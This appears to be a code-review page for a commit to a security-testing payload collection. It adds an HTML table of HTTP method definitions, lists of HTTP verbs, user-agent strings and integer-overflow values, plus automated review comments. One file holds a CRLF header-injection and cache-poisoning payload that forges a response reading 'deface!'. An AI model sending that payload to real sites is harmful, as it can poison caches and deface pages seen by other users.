||||
<!--
|
||||
/* Style Definitions */
|
||||
p.MsoNormal, li.MsoNormal, div.MsoNormal
|
||||
{margin:0cm;
|
||||
margin-bottom:.0001pt;
|
||||
font-size:12.0pt;
|
||||
font-family:"Times New Roman";}
|
||||
h2
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:18.0pt;
|
||||
font-family:"Times New Roman";
|
||||
color:#354278;
|
||||
font-weight:bold;}
|
||||
h5
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:10.0pt;
|
||||
font-family:"Times New Roman";
|
||||
color:#354278;
|
||||
font-weight:bold;}
|
||||
a:link, span.MsoHyperlink
|
||||
{color:blue;
|
||||
text-decoration:underline;}
|
||||
a:visited, span.MsoHyperlinkFollowed
|
||||
{color:purple;
|
||||
text-decoration:underline;}
|
||||
p
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:12.0pt;
|
||||
font-family:"Times New Roman";}
|
||||
p.doctext, li.doctext, div.doctext
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:10.5pt;
|
||||
font-family:"Times New Roman";
|
||||
color:black;}
|
||||
span.docemphasis1
|
||||
{font-style:italic;}
|
||||
@page Section1
|
||||
{size:595.3pt 841.9pt;
|
||||
margin:3.0cm 2.0cm 3.0cm 2.0cm;}
|
||||
div.Section1
|
||||
{page:Section1;}
|
||||
-->
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body lang=DA link=blue vlink=purple>
|
||||
|
||||
<div class=Section1>
|
||||
|
||||
|
||||
<p class=doctext>These tables contain a nearly complete list of all the
|
||||
methods, requests, and header fields of typical HTTP/1.0 and HTTP/1.1 requests
|
||||
and responses.</p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><a name=app02table01></a><span
|
||||
style='font-size:10.5pt;font-family:Arial'> HTTP/1.1 Methods and
|
||||
Field Definitions</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Method</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Request</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Definition</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>GET <span class=docemphasis1><Request-URI>?query_string</span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>The GET method is used to retrieve whatever is stored or produced
|
||||
by the resource located at the specified Request-URI. The GET method can be
|
||||
used to request files, to invoke server-side scripts, to interact with
|
||||
server-side CGI programs, and more. When HTML form variables are submitted
|
||||
with the form action set to GET, the form parameters are encoded in a query
|
||||
string and submitted to the HTTP server as part of the Request-URI using the
|
||||
GET request method.</p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>POST </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>POST <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n</p>
|
||||
<p class=doctext>Content-Length: <span class=docemphasis1><length in
|
||||
bytes></span>\r\n</p>
|
||||
<p class=doctext>Content-Type: <span class=docemphasis1><content type></span>\r\n\r\n</p>
|
||||
<p class=doctext><span class=docemphasis1><query_string or other data to
|
||||
post to Request-URI></span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The POST method is used to submit data to the resource located
|
||||
at the specified Request-URI. Typically, the resource located at the
|
||||
specified Request-URI is a server-side script or CGI program designed to
|
||||
processes form data. When HTML form variables are submitted with the form
|
||||
action set to POST, the form parameters are encoded and submitted to the HTTP
|
||||
server as the body of the POST request message. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>HEAD </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>HEAD <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The HEAD method is identical to the GET method except that
|
||||
an HTTP 1.1 server should not return a message-body in the response. The
|
||||
meta-information contained in the HTTP headers in response to a HEAD request
|
||||
should be identical to the information sent in response to a GET request.
|
||||
This method can be used for obtaining meta-information about the entity
|
||||
implied by the request without transferring the entity-body itself. This
|
||||
method is often used for testing hypertext links for validity, accessibility,
|
||||
and recent modification."—Section 9.4, RFC 2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>PUT </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>PUT <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n</p>
|
||||
<p class=doctext>Content-Length: <span class=docemphasis1><length in
|
||||
bytes></span>\r\n</p>
|
||||
<p class=doctext>Content-Type: <span class=docemphasis1><content type></span>\r\n\r\n</p>
|
||||
<p class=doctext><span class=docemphasis1><data to put to file></span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The PUT method allows for data to be transferred to an HTTP
|
||||
server and stored at the location identified by the Request-URI. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>OPTIONS </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>OPTIONS <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The OPTIONS method represents a request for information
|
||||
about the communication options available on the request/response chain
|
||||
identified by the Request-URI." —Section 9.2, RFC 2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>DELETE </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>DELETE <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The DELETE method requests that the origin server delete
|
||||
the resource identified by the Request-URI."—Section 9.7, RFC 2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>TRACE </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>TRACE <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The TRACE method is used to invoke a remote,
|
||||
application-layer loop-back of the request message…. TRACE allows the client
|
||||
to see what is being received at the other end of the request chain and use
|
||||
that data for testing and diagnostic information."—Section 9.8, RFC
|
||||
2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>CONNECT </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>CONNECT <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The CONNECT message type is used to specify a proxy connection
|
||||
to the resource identified by the Request-URI. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
</COLGROUP>
|
||||
</table>
|
||||
|
||||
<p style='margin:0cm;margin-bottom:.0001pt'><a name=app02table02></a><span
|
||||
style='color:black;display:none'> </span></p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><span style='font-size:10.5pt;
|
||||
font-family:Arial'>Table B-2. HTTP/1.0 Methods and Field Definitions</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Method</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Request</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Definition</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET <span class=docemphasis1><Request-URI>?query_string</span>
|
||||
HTTP/1.1\r\n\r\n </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The GET method is used to retrieve whatever is stored or
|
||||
produced by the resource located at the specified Request-URI. The GET method
|
||||
can be used to request files, to invoke server-side scripts, to interact with
|
||||
server-side CGI programs, and more. When HTML form variables are submitted with
|
||||
the form action set to GET, the form parameters are encoded in a query string
|
||||
and submitted to the HTTP server as part of the Request-URI using the GET
|
||||
request method. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>POST </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext><span lang=EN-GB>POST <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n\</span></p>
|
||||
<p class=doctext><span lang=EN-GB>Content-Length: <span class=docemphasis1><length
|
||||
in bytes></span>\r\n</span></p>
|
||||
<p class=doctext><span lang=EN-GB>Content-Type: <span class=docemphasis1><content
|
||||
type></span>\r\n\r\n</span></p>
|
||||
<p class=doctext><span class=docemphasis1><span lang=EN-GB><query_string
|
||||
or other data to post to Request-URI></span></span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The POST method is used to submit data to the resource located
|
||||
at the specified Request-URI. Typically, the resource located at the
|
||||
specified Request-URI is a server-side script or CGI program designed to
|
||||
processes form data. When HTML form variables are submitted with the form
|
||||
action set to POST, the form parameters are encoded and submitted to the HTTP
|
||||
server as the body of the POST request message. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>HEAD </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>HEAD <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n\r\n </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The HEAD method is identical to the GET method except that
|
||||
an HTTP 1.1 server should not return a message-body in the response. The
|
||||
meta-information contained in the HTTP headers in response to a HEAD request
|
||||
should be identical to the information sent in response to a GET request. This
|
||||
method can be used for obtaining meta-information about the entity implied by
|
||||
the request without transferring the entity-body itself. This method is often
|
||||
used for testing hypertext links for validity, accessibility, and recent
|
||||
modification."—Section 9.4, RFC 2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
</COLGROUP>
|
||||
</table>
|
||||
|
||||
<p style='margin:0cm;margin-bottom:.0001pt'><a name=app02table03></a><span
|
||||
style='color:black;display:none'> </span></p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><span lang=EN-GB style='font-size:
|
||||
10.5pt;font-family:Arial'>Table B-3. HTTP/1.0 Undefined Method Description as
|
||||
Found in </span><span style='font-size:10.5pt;font-family:Arial'><a
|
||||
href="http:// /?xmlid=0-201-76176-9/app04#app04"><span
|
||||
lang=EN-GB style='color:#003399'>Appendix D</span></a></span><span
|
||||
lang=EN-GB style='font-size:10.5pt;font-family:Arial'> of RFC 1945.</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Method</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Request</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Definition</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>PUT </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The PUT message format is not defined in RFC 1945. In practice,
|
||||
the PUT message format is the same as for HTTP 1.1. </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The PUT method allows for data to be transferred to an HTTP
|
||||
server and stored at the location identified by the Request-URI. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>DELETE </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The DELETE message format is not defined in RFC 1945. In
|
||||
practice, the DELETE message format is the same as for HTTP 1.1. </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The DELETE method requests that the origin server delete
|
||||
the resource identified by the Request-URI."— Appendix D.1, Section
|
||||
D.1.2, RFC 1945. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>LINK </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The LINK message format is not defined in RFC 1945 and is not
|
||||
implemented by most/all HTTP 1.0 implementations. </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The LINK method establishes one or more Link relationships
|
||||
between the existing resource identified by the Request-URI and other
|
||||
existing resources."— Appendix D.1, Section D.1.3, RFC 1945. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>UNLINK </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The UNLINK message format is not defined in RFC 1945 and is not
|
||||
implemented by most/all HTTP 1.0 implementations. </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The UNLINK method removes one or more Link relationships
|
||||
from the existing resource identified by the Request-URI."— Appendix
|
||||
D.1, Section D.1.4, RFC 1945. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<p class=MsoNormal> </p>
|
||||
|
||||
</div>
|
||||
|
||||
<!--504690132--><br></body>
|
||||
|
||||
</html>
|
||||
|
|
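Review bot: In the table captioned "Table B-2. HTTP/1.0 Methods and Field Definitions", the GET, POST and HEAD request lines all end in `HTTP/1.1`, which contradicts the caption; they should read `HTTP/1.0`, or the caption should say why 1.1 is shown. Smaller markup points in the same file: the first two tables close with a stray `</COLGROUP>` that has no opening tag, the HTTP/1.1 GET example ends in a truncated `\r\n\r\` and the HTTP/1.0 POST request line in `\r\n\`, the first table's caption has no "Table B-1." label although the other two are numbered, and the "Appendix D" link has a broken `href` (`http:// /?xmlid=...`). As this is Word-filtered HTML with inline styles, a plain-text table would be easier to review and maintain.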
@ -0,0 +1,5 @@
|
|||
# Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010)
|
||||
# creative commons license http://creativecommons.org/licenses/by/3.0/
|
||||
# projurl
|
||||
GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1
|
||||
%0d%0aX-Injection-Header:%20AttackValue
|
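Review bot: The first request template hard-codes `testsite.com/redir.php` directly after the `{SITE}` placeholder, so substituting `{SITE}` yields a host name the tester did not choose; keep only the fully parameterised `{SITE}/{REDIRECTURL}` form. The two templates are also run together on one line (`HTTP/1.1GET`) and should be separate entries, and the `# projurl` comment is an unfilled placeholder that should carry the project URL or be dropped.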
33
attack-payloads/http-protocol/http-protocol-methods.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb 1.0 - (Update: 16 March 2010)
|
||||
# creative commons
|
||||
OPTIONS
|
||||
GET
|
||||
HEAD
|
||||
POST
|
||||
PUT
|
||||
DELETE
|
||||
TRACE
|
||||
CONNECT
|
||||
PROPFIND
|
||||
PROPPATCH
|
||||
MKCOL
|
||||
COPY
|
||||
MOVE
|
||||
LOCK
|
||||
UNLOCK
|
||||
VERSION-CONTROL
|
||||
REPORT
|
||||
CHECKOUT
|
||||
CHECKIN
|
||||
UNCHECKOUT
|
||||
MKWORKSPACE
|
||||
UPDATE
|
||||
LABEL
|
||||
MERGE
|
||||
BASELINE-CONTROL
|
||||
MKACTIVITY
|
||||
ORDERPATCH
|
||||
ACL
|
||||
PATCH
|
||||
SEARCH
|
||||
ARBITRARY
|
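Review bot: The header comment claims "All HTTP Verbs Defined in RFC's" but names no RFCs, and the list omits `LINK` and `UNLINK`, which docs.http-method-defs.html in this same commit documents from Appendix D of RFC 1945. Cite the RFCs the list covers and either add the two verbs or narrow the claim. The license line `# creative commons` should also carry the license URL, as the header-injection file in this commit does.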
30
attack-payloads/http-protocol/user-agents.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
# List of user agents from jbrofuzz (13 april 2010)
|
||||
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
|
||||
User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)
|
||||
User-Agent: Mozilla/4.79 [en] (WinNT; U)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14
|
||||
User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
|
||||
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5G77 Safari/525.20
|
||||
User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
|
||||
User-Agent: Opera/9.27 (Windows NT 5.1; U; en)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.25 Safari/525.19
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19
|
||||
User-Agent: Wget/1.8.2
|
||||
User-Agent: Mozilla/5.0 (PLAYSTATION 3; 1.00)
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/1.4
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
|
||||
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
|
||||
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20070606
|
||||
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14
|
||||
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5
|
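Review bot: Every entry carries the `User-Agent: ` header name as well as the value, and the header comment does not say so; a consumer that substitutes an entry into the header value will send `User-Agent: User-Agent: ...`. Either strip the prefix so the file holds values only, or state in the first line that each entry is a complete header line.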
13
attack-payloads/integer-overflow/integer-overflows.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
# integer overflows from jbrofuzz
|
||||
-1
|
||||
0
|
||||
0x100
|
||||
0x1000
|
||||
0x3fffffff
|
||||
0x7ffffffe
|
||||
